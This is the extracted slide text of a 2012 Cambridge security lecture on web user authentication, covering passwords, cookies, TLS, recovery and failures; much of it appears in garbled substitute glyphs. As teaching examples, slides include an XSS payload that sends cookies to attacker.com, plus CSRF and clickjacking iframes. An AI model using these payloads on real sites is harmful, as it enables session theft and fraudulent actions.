User authentication on the web Joseph Bonneau - - PowerPoint PPT Presentation

User authentication on the web

Joseph Bonneau ❥❝❜✽✷❅❝❧✳❝❛♠✳❛❝✳✉❦

Computer Laboratory

Part II Security lecture 2012

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 1 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 1 / 41

The web was not designed with authentication in mind

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 2 / 41

The web was not designed with authentication in mind

• ❊❚ ✴ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❝❧✳❝❛♠✳❛❝✳✉❦ 128.28.2.138 − → www.cl.cam.ac.uk ❍❚❚P✴✶✳✶ ✷✵✵ ❖❑ ❈♦♥t❡♥t ❧❡♥❣t❤✿ ✼✻✻✶ ❈♦♥t❡♥t✲❚②♣❡✿ t❡①t✴❤t♠❧ ❁✦❉❖❈❚❨P❊ ❤t♠❧ P❯❇▲■❈ ✧✲✴✴❲✸❈✴✴❉❚❉ ❳❍❚▼▲ ✶✳✵ ✳✳✳ 128.28.2.138 ← − www.cl.cam.ac.uk

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 2 / 41

Authentication is used for many purposes

Persistent online identities

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 3 / 41

Authentication is used for many purposes

Online linking to offline identity

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 3 / 41

Authentication is used for many purposes

Customising online preferences

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 3 / 41

Authentication is used for many purposes

100 200 300 400 500 Traffic rank 0.0 0.2 0.4 0.6 0.8 1.0 Proportion of sites collecting passwords

Frequency of password collection

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 3 / 41

Many requirements for “perfect” authentication

1

Secure

1

Criminals (may know target)

2

Malware

3

Rogue servers

4

Phishers

2

Low cost

1

Easy for users

2

Cheap for servers

3

Easy to implement

4

Widely compatible

3

Privacy-enabling

1

Users choose to reveal identity

2

Easy to create new identities

3

Malicious sites get no information

4

Legal

1

non-repudiable (sometimes)

2

tracable (sometimes)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 4 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 4 / 41

Password enrolment

Wall Street Journal, 1996 Wall Street Journal, 2010

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 5 / 41

Password enrolment

❁❢♦r♠ ♠❡t❤♦❞❂✧♣♦st✧ ❛❝t✐♦♥❂✧✉s❡r❴❡♥r♦❧✳❝❣✐✧❃ ❈r❡❛t❡ ❛ ✉s❡r♥❛♠❡✿ ❁✐♥♣✉t t②♣❡❂✧t❡①t✧ ♥❛♠❡❂✧✉s❡r✧✴❃ ❁❜r✴❃ ❈❤♦♦s❡ ♣❛ss✇♦r❞✿ ❁✐♥♣✉t t②♣❡❂✧♣❛ss✇♦r❞✧ ♥❛♠❡❂✧♣❛ss✧✴❃ ❁❜r✴❃ ❁✐♥♣✉t t②♣❡❂✧s✉❜♠✐t✧ ♥❛♠❡❂✧s✉❜♠✐t✧ ✴❃ ❁✴❢♦r♠❃ 128.28.2.138 ← − http://www.example.com/

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 5 / 41

Password enrolment

P❖❙❚ ✉s❡r❴❡♥r♦❧✳❝❣✐ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❈♦♥t❡♥t✲❚②♣❡✿ ❛♣♣❧✐❝❛t✐♦♥✴ ①✲✇✇✇✲❢♦r♠✲✉r❧❡♥❝♦❞❡❞ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✸✵ ✉s❡r❂❥❝❜✽✷✫♣❛ss❂q✇❡rt② 128.28.2.138 − → http://www.example.com/

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 5 / 41

Password enrolment

P❖❙❚ ✉s❡r❴❡♥r♦❧✳❝❣✐ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❈♦♥t❡♥t✲❚②♣❡✿ ❛♣♣❧✐❝❛t✐♦♥✴ ①✲✇✇✇✲❢♦r♠✲✉r❧❡♥❝♦❞❡❞ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✸✵ ✉s❡r❂❥❝❜✽✷✫♣❛ss❂q✇❡rt② 128.28.2.138 − → https://www.example.com/

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 5 / 41

Password storage

❯❙❊❘ P❆❙❙ ❥❝❜✽✷ q✇❡rt② r❥❛✶✹ ❞✺❜❢✧❴✮✯✭✫✭✮✧✩ ♠❣❦✷✺ ✐❴❧♦✈❡❴❢♦✉r✐❡r ✳✳✳ ✳✳✳

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 6 / 41

Password storage

❯❙❊❘ P❆❙❙❴❍❆❙❍ ❥❝❜✽✷ ✶✸❡✽✼✹✻✾✹❜❝✾ r❥❛✶✹ ❞❞❞✽✼❡✾❢✺✼✶❛ ♠❣❦✷✺ ✺❜✼✷❢❜❛✾✼❡✶✹ ✳✳✳ ✳✳✳ PASS_HASHi = SHA-256(passwordi)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 6 / 41

Password storage

❯❙❊❘ P❆❙❙❴❍❆❙❍ ❥❝❜✽✷ ✶✸❡✽✼✹✻✾✹❜❝✾ r❥❛✶✹ ❞❞❞✽✼❡✾❢✺✼✶❛ ♠❣❦✷✺ ✺❜✼✷❢❜❛✾✼❡✶✹ ✳✳✳ ✳✳✳ ❤❦✸✸✶ ✶✸❡✽✼✹✻✾✹❜❝✾ ✳✳✳ ✳✳✳ PASS_HASHi = SHA-256(passwordi)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 6 / 41

Password storage

❯❙❊❘ ❙❆▲❚❊❉❴❍❆❙❍ ❙❆▲❚ ❥❝❜✽✷ ❝❢❡❛✾❡❞❢❡✵❜❞✳✳✳ ✵❝❜✾✳✳✳ r❥❛✶✹ ✾✽✽✸✵✼✽❡✷✾✺✸✳✳✳ ✶❢✶✸✳✳✳ ♠❣❦✷✺ ❛✻❜✵✷❝❡❞✶✹✸❡✳✳✳ ❜✶✻✽✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ ❤❦✸✸✶ ✺❞❜❡✹❡✽✺✽✺✾✼✳✳✳ ✸❜✼✸✳✳✳ ✳✳✳ ✳✳✳ salti = random[0 : 64] SALTED_HASHi = SHA-256(passwordi||salti)N

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 6 / 41

Login

P❖❙❚ ❧♦❣✐♥✳♣❤♣ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❈♦♥t❡♥t✲❚②♣❡✿ ❛♣♣❧✐❝❛t✐♦♥✴ ①✲✇✇✇✲❢♦r♠✲✉r❧❡♥❝♦❞❡❞ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✸✹ ♥❛♠❡❂❥❝❜✽✷✫♣❛ss❂q✇❡rt② 128.28.2.138 − → https://www.example.com

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 7 / 41

Login

❍❚❚P✴✶✳✶ ✸✵✷ ▼♦✈❡❞ ❚❡♠♣♦r❛r✐❧② ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ▲♦❝❛t✐♦♥✿ ❤tt♣✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴♠❛✐♥ ❙❡t✲❈♦♦❦✐❡✿ ✉s❡r❴✐❞❂✽✷✶✶✽✸❀ ❡①♣✐r❡s❂❙❛t✱ ✶✶✲❉❡❝✲✷✵✶✵ ✶✺✿✹✽✿✸✽ ●▼❚❀ ♣❛t❤❂✴❀ ❙❡t✲❈♦♦❦✐❡✿ ❛✉t❤❂❢✵❡❜✻❛✶❜❞❢❢✳✳✳ ❡①♣✐r❡s❂❙❛t✱ ✶✶✲❉❡❝✲✷✵✶✵ ✶✺✿✹✽✿✸✽ ●▼❚❀ ♣❛t❤❂✴❀ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✵ 128.28.2.138 ← − https://www.example.com

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 7 / 41

Login

• ❊❚ ✴♠❛✐♥✳❤t♠❧ ❍❚❚P✴✶✳✶

❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❈♦♦❦✐❡✿ ✉s❡r❴✐❞❂✽✷✶✶✽✸❀ ❛✉t❤❂❢✵❡❜✻❛✶❜❞❢❢✳✳✳ 128.28.2.138 − → http://www.example.com

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 7 / 41

Logout

P❖❙❚ ❧♦❣♦✉t✳♣❤♣ ❍❚❚P✴✶✳✶ ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ❈♦♥t❡♥t✲❚②♣❡✿ ❛♣♣❧✐❝❛t✐♦♥✴ ①✲✇✇✇✲❢♦r♠✲✉r❧❡♥❝♦❞❡❞ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✵ 128.28.2.138 − → www.example.com

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 8 / 41

Logout

❍❚❚P✴✶✳✶ ✸✵✷ ▼♦✈❡❞ ❚❡♠♣♦r❛r✐❧② ❍♦st✿ ✇✇✇✳❡①❛♠♣❧❡✳❝♦♠ ▲♦❝❛t✐♦♥✿ ❤tt♣✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴♠❛✐♥ ❙❡t✲❈♦♦❦✐❡✿ ✉s❡r❴✐❞❂✵❀ ♣❛t❤❂✴❀ ❙❡t✲❈♦♦❦✐❡✿ ❛✉t❤❂✵ ♣❛t❤❂✴❀ ❈♦♥t❡♥t✲▲❡♥❣t❤✿ ✵ 128.28.2.138 ← − www.example.com

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 8 / 41

Update

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 9 / 41

Recovery

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 10 / 41

Recovery

❍✐ ❥❜♦♥♥❡❛✉✱ ❙♦♠❡♦♥❡ r❡q✉❡st❡❞ t❤❛t ②♦✉r ▲❛st✳❢♠ ♣❛ss✇♦r❞ ❜❡ r❡s❡t✳ ■❢ t❤✐s ✇❛s♥✬t ②♦✉✱ t❤❡r❡✬s ♥♦t❤✐♥❣ t♦ ✇♦rr② ❛❜♦✉t ✲ s✐♠♣❧② ✐❣♥♦r❡ t❤✐s ❡♠❛✐❧ ❛♥❞ ♥♦t❤✐♥❣ ✇✐❧❧ ❝❤❛♥❣❡✳ ■❢ ②♦✉ ❉■❉ ❛s❦ t♦ r❡s❡t t❤❡ ♣❛ss✇♦r❞ ♦♥ ②♦✉r ▲❛st✳❢♠ ❛❝❝♦✉♥t✱ ❥✉st ❝❧✐❝❦ ❤❡r❡ t♦ ♠❛❦❡ ✐t ❤❛♣♣❡♥✿ ❤tt♣✿✴✴✇✇✇✳❧❛st✳❢♠✴❄✐❞❂❁✉s❡r✐❞❃ ✫❦❡②❂❁❛✉t❤❡♥t✐❝❛t✐♦♥✲t♦❦❡♥❃ ❇❡st ❘❡❣❛r❞s✱ ❚❤❡ ▲❛st✳❢♠ ❚❡❛♠

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 10 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

1

Technical failures (false authentication)

2

User interface failures

3

Human memory failures

4

Economic failures

5

Technical failures (unintended authentication)

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 11 / 41

Plaintext passwords sent over SMTP

❉❡❛r ❏♦s❡♣❤ ❇♦♥♥❡❛✉✱ ❨♦✉ r❡q✉❡st❡❞ ✉s t♦ s❡♥❞ ②♦✉ ②♦✉r ❊❛s②❈❤❛✐r ❧♦❣✐♥ ✐♥❢♦r♠❛t✐♦♥✳ P❧❡❛s❡ ✉s❡ t❤❡ ❢♦❧❧♦✇✐♥❣ ❞❛t❛ t♦ ❧♦❣ ✐♥ t♦ ❊❛s②❈❤❛✐r✿ ❯s❡r ♥❛♠❡✿ ❥❜♦♥♥❡❛✉ P❛ss✇♦r❞✿ q✇❡rt② ❇❡st r❡❣❛r❞s✱ ❊❛s②❈❤❛✐r ▼❡ss❡♥❣❡r✳ Password recovery, EasyChair

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 12 / 41

Insecure at-rest storage of passwords

29-50% of sites store passwords in the clear

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 13 / 41

Insecure at-rest storage of passwords

RockYou SQL injection hack January 2010

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 13 / 41

Incomplete TLS deployment

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 14 / 41

Incomplete TLS deployment

Password sniffing

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 14 / 41

Incomplete TLS deployment

❁❢♦r♠ ♠❡t❤♦❞❂✧♣♦st✧ ❛❝t✐♦♥❂✧❤tt♣s✿✴✴✇✇✇✳❡①❛♠♣❧❡✳❝♦♠✴✉s❡r❴❧♦❣✐♥✳❝❣✐✧❃ ❯s❡r♥❛♠❡✿ ❁✐♥♣✉t t②♣❡❂✧t❡①t✧ ♥❛♠❡❂✧✉s❡r✧ ✴❃ ❁❜r ✴❃ P❛ss✇♦r❞✿ ❁✐♥♣✉t t②♣❡❂✧♣❛ss✇♦r❞✧ ♥❛♠❡❂✧♣❛ss✧ ✴❃ ❁❜r ✴❃ ❁✐♥♣✉t t②♣❡❂✧s✉❜♠✐t✧ ♥❛♠❡❂✧s✉❜♠✐t✧ ✴❃ ❁✴❢♦r♠❃ Post-only TLS deployment

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 14 / 41

Incomplete TLS deployment

TLS Deployment I E C Tot. Full 0.07 0.26 0.07 0.39 Full/POST 0.02 0.01 0.01 0.03 Inconsistent 0.09 0.04 0.03 0.17 None 0.15 0.03 0.23 0.41

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 14 / 41

Cookie theft post-TLS

Wireshark

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 15 / 41

Cookie theft post-TLS

Firesheep

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 15 / 41

Cookie stealing via cross-site scripting

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 16 / 41

Cookie stealing via cross-site scripting

❨♦✉r s✉❜♠✐ss✐♦♥ ✇✐❧❧ r❡❢❡r❡♥❝❡✿❁❜r✴❃ ❤tt♣✿✇✇✇✳❡s♣♥✳❝♦♠✴❝♦❧❧❡❣❡✲❢♦♦t❜❛❧❧ http://dynamic.espn.go.com/bugs? url=http:www.espn.com/college-football

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 16 / 41

Cookie stealing via cross-site scripting

❨♦✉r s✉❜♠✐ss✐♦♥ ✇✐❧❧ r❡❢❡r❡♥❝❡✿❁❜r✴❃ ❁s❝r✐♣t❃ ❞♦❝✉♠❡♥t✳❧♦❝❛t✐♦♥ ❂ ✧❤tt♣✿✴✴✇✇✇✳❛tt❛❝❦❡r✳❝♦♠✴❝♦♦❦✐❡✲❧♦❣✳❝❣✐❄✧ ✰ ❞♦❝✉♠❡♥t✳❝♦♦❦✐❡ ❁✴s❝r✐♣t❃ http://dynamic.espn.go.com/bugs? url=%3Cscript%3E%0Adocument.location +%3D%0A%22http%3A//www.attacker.com/cookie- log.cgi%3F%22%0A%2B+document.cookie%0A%3C/script%3E

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 16 / 41

Weak cookies

❙■❉ ❯■❉ ❖t❤❡r ❞❛t❛ ✸✾✹✸✹✶✷✺✽✻ r❥❛✶✹ ✳✳✳ ✸✾✹✸✹✶✷✺✽✼ ♠❣❦✷✺ ✳✳✳ ✸✾✹✸✹✶✷✺✽✽ ❥❝❜✽✷ ✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

❙■❉ ❯■❉ ❖t❤❡r ❞❛t❛ ✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✻✿✹✸ r❥❛✶✹ ✳✳✳ ✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✼✿✸✽ ♠❣❦✷✺ ✳✳✳ ✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✽✿✶✶ ❥❝❜✽✷ ✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

❙■❉ ❯■❉ ❖t❤❡r ❞❛t❛ H✭✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✻✿✹✸✮ r❥❛✶✹ ✳✳✳ H✭✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✼✿✸✽✮ ♠❣❦✷✺ ✳✳✳ H✭✷✵✶✵✲✶✶✲✶✺❚✶✷✿✵✽✿✶✶✮ ❥❝❜✽✷ ✳✳✳ ✳✳✳ ✳✳✳ ✳✳✳ Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

COOKIEi = i||❝r②♣t(i||Kdaily)

Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

COOKIEi = i||❝r②♣t(i||Kdaily)

COOKIEjbonneau = jbonneau7c19f550a775b614 COOKIEjbonneau1 = jbonneau17c19f550a775b614

Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

COOKIEi = i||❝r②♣t(i||Kdaily)

COOKIEjbonnea = jbonneac6ceb34c403d1f6d COOKIEjbonneaN = jbonneaNc6ceb34c403d1f6d COOKIEj = j938c00d2f12c73a4 COOKIEjNov201999 = jNov201999938c00d2f12c73a4

Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

COOKIEi = i||t||MACk(i||t)

Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Weak cookies

COOKIEi = i||t||MACk(i||t)

COOKIEjcb82(1-Dec-2010) = ❥❝❜✽✷✶✲❉❡❝✲✷✵✶✵✺❝❛✺✼✺✶✷❢✹❞❜✽❢❞✶✽✷✺✹❛❞❝❡✾❜✽❡❢✹✸✽ = COOKIEjcb8(21-Dec-2010)

Predictable session identifiers Misuse of cryptography Improper field delimitation

Fu et al., 2001

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 17 / 41

Cross-site request forgery

❁✐❢r❛♠❡ ♥❛♠❡❂✧❝sr❢✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣✿✴✴❜❛♥❦✳❡①❛♠♣❧❡✳❝♦♠✴tr❛♥s❢❡r❄ ✫❛♠♦✉♥t❂✶✵✵✵✵✵✵✫t♦❂❛tt❛❝❦❡r✧❃ ❁✴✐❢r❛♠❡❃

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 18 / 41

Cross-site request forgery

❁✐❢r❛♠❡ ♥❛♠❡❂✧❝sr❢✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣✿✴✴t✇✐tt❡r✳❝♦♠✴s❤❛r❡✴✉♣❞❛t❡❄ st❛t✉s❂✐✪✷✵❣♦t✪✷✵♣✇♥❡❞✧❃ ❁✴✐❢r❛♠❡❃

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 18 / 41

Clickjacking

http://www.facebook.com/connect/uiserver.php?app_id=102452128776

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 19 / 41

Clickjacking

❁✐❢r❛♠❡ ♥❛♠❡❂✧❝sr❢✧ ✇✐❞t❤❂✧✵✧ ❤❡✐❣❤t❂✧✵✧ ❢r❛♠❡❜♦r❞❡r❂✧✵✧ sr❝❂✧❤tt♣✿✴✴✇✇✇✳❢❛❝❡❜♦♦❦✳❝♦♠✴❝♦♥♥❡❝t✴ ✉✐s❡r✈❡r✳♣❤♣❄❛♣♣❴✐❞❂✶✵✷✹✺✷✶✷✽✼✼✻✧ st②❧❡❂✧♦♣❛❝✐t②✿ ✵❀ ❢✐❧t❡r✿ ❛❧♣❤❛✭♦♣❛❝✐t②❂✵✮❀ ♣♦s✐t✐♦♥✿ ❛❜s♦❧✉t❡❀t♦♣✿ ✲✶✼✵♣①❀❧❡❢t✿ ✲✹✶✽♣①❀✧❃ ❁✴✐❢r❛♠❡❃ ❁✐♠❣ sr❝❂✧❝❧✐❝❦❥❛❝❦✐♥❣❴❜❛✐t✳❥♣❣✧❃

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 19 / 41

Clickjacking

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 19 / 41

Clickjacking

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 19 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

1

Technical failures (false authentication)

2

User interface failures

3

Human memory failures

4

Economic failures

5

Technical failures (unintended authentication)

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 20 / 41

No trusted path between users and browser

(a) Hand tracking analysis. Rectangles identify regions in movement. Black rectangles are used for movements in the hands regions, grey rectangles for keys, white rectangles for regions where both hand and key movement happens. These rectangles identify likely key pressings. (b) Key pressing analysis. Using occlusion-based techniques, the analysis determines keys that are not pressed, which are represented by the dark polygons.

Balzarotti et al. 2008

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 21 / 41

No trusted path between users and browser

Hardware keylogger, US$36

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 21 / 41

No trusted path between users and browser

Software keylogger, US$49.50

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 21 / 41

No trusted path between users and browser

Phishing (Firefox)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 21 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

1

Technical failures (false authentication)

2

User interface failures

3

Human memory failures

4

Economic failures

5

Technical failures (unintended authentication)

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 22 / 41

Brute-force attacks

123456 12345 123456789 password iloveyou princess 1234567 rockyou 12345678 abc123 nicole daniel babygirl monkey lovely jessica 654321 michael

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Brute-force attacks

Rate limiting (Truthdig)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Brute-force attacks

Forced reset (Cafe Press)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Brute-force attacks

CAPTCHA restrictions (Wikipedia)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Brute-force attacks

countermeasure I E C Tot. CAPTCHA 0.07 0.01 0.01 0.09 timeout 0.01 0.01 0.01 0.03 reset 0.01 0.02 0.01 0.03 none 0.25 0.29 0.31 0.84

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Brute-force attacks

limit I E C Tot. 3 0.02 0.00 0.00 0.02 4 0.01 0.01 0.00 0.01 5 0.02 0.01 0.03 0.06 6 0.01 0.01 0.00 0.03 7 0.01 0.00 0.00 0.01 10 0.01 0.00 0.00 0.01 15 0.01 0.00 0.00 0.01 20 0.00 0.01 0.00 0.01 25 0.01 0.00 0.00 0.01 > 100 0.25 0.29 0.31 0.84

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Brute-force attacks

0.0 0.2 0.4 0.6 0.8 1.0 success rate α 5 10 15 20 25 30 35 marginal work ˜ µα (bits)

Yahoo! [2011] Battlefield Heroes [2011] Gawker [2010] RockYou [2009] Morris [79] Klein [90]

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 23 / 41

Personal knowledge questions

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 24 / 41

Personal knowledge questions

Web search

Used against Sarah Palin in 2008

Public records

Griffith et. al: 30% of individual’s mother’s maiden names

Social engineering Dumpster diving, burglary Acquaintance attacks

Schecter et. al: ∼ 25% of questions guessed by friends, family

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 24 / 41

Personal knowledge questions

70% of answers are proper names (Just et al. 2008)

25% surname 10% forename 15% pet name 20% place name

Most others are trivially insecure

❲❤❛t ✐s ♠② ❢❛✈♦✉r✐t❡ ❝♦❧♦✉r❄ ❲❤❛t ✐s t❤❡ ✇♦rst ❞❛② ♦❢ t❤❡ ✇❡❡❦❄

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 24 / 41

Personal knowledge questions

0.0 0.2 0.4 0.6 0.8 1.0 success rate α 5 10 15 20 25 30 35 40 marginal guesswork ˜ µα

Forename Surname Password [RockYou] Password [Klein] Password [Spafford] Password [Schneier]

Personal knowledge worse than passwords (Bonneau et al. 2010)

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 24 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

1

Technical failures (false authentication)

2

User interface failures

3

Human memory failures

4

Economic failures

5

Technical failures (unintended authentication)

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 25 / 41

Systemic trends in web authentication

100 200 300 400 500 Traffic rank 0.0 0.2 0.4 0.6 0.8 1.0 Proportion of sites collecting passwords

All sites collect passwords All sites utilise email infrastructure

Naming Liveness checks Password recovery

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 26 / 41

Systemic trends in web authentication

All sites collect passwords All sites utilise email infrastructure

Naming Liveness checks Password recovery

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 26 / 41

Economic models

Password over-collection is a tragedy of the commons Password insecurity is a negative externality

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 27 / 41

Economic models

Password over-collection is a tragedy of the commons Password insecurity is a negative externality

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 27 / 41

Consequences

100 200 300 400 500 Traffic rank 0.0 0.2 0.4 0.6 0.8 1.0 Proportion of sites collecting passwords

Users overwhelmed by password burden

Average person has > 25 accounts (Flôrencio et al., 2007)

Users forced to re-use passwords across security contexts Cross-site password compromise increasing

Email accounts becoming powerful credentials

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 28 / 41

Consequences

10 1E-2 1E-1 1E+0 1E+1 1E+2 1E+3 1E+4 1E+5 password score page views per million E-commerce News/Customization User interaction

Users overwhelmed by password burden

Average person has > 25 accounts (Flôrencio et al., 2007)

Users forced to re-use passwords across security contexts Cross-site password compromise increasing

Email accounts becoming powerful credentials

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 28 / 41

Consequences

Users overwhelmed by password burden

Average person has > 25 accounts (Flôrencio et al., 2007)

Users forced to re-use passwords across security contexts Cross-site password compromise increasing

Email accounts becoming powerful credentials

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 28 / 41

Consequences

Users overwhelmed by password burden

Average person has > 25 accounts (Flôrencio et al., 2007)

Users forced to re-use passwords across security contexts Cross-site password compromise increasing

Email accounts becoming powerful credentials

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 28 / 41

Talk outline

1

What are we trying to achieve?

2

What’s done in practice

3

What goes wrong

1

Technical failures (false authentication)

2

User interface failures

3

Human memory failures

4

Economic failures

5

Technical failures (unintended authentication)

4

Can we do better?

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 29 / 41

Implicit identifiers

❙❘❈✿ ✶✷✽✳✷✸✷✳✽✳✶✻✽ ❉❙❚✿ ✶✷✽✳✷✸✷✳✵✳✷✵ ✳✳✳

1

IP address

2

HTTP headers

3

HTTP referer

4

Javascript runtime (also Flash, Java, Silverlight ...)

5

Cross-site de-anonymisation

• J. Bonneau (U. of Cambridge)

User authentication on the web February 22, 2012 30 / 41

Implicit identifiers

• ❊❚ ✴ ❍❚❚P✴✶✳✶

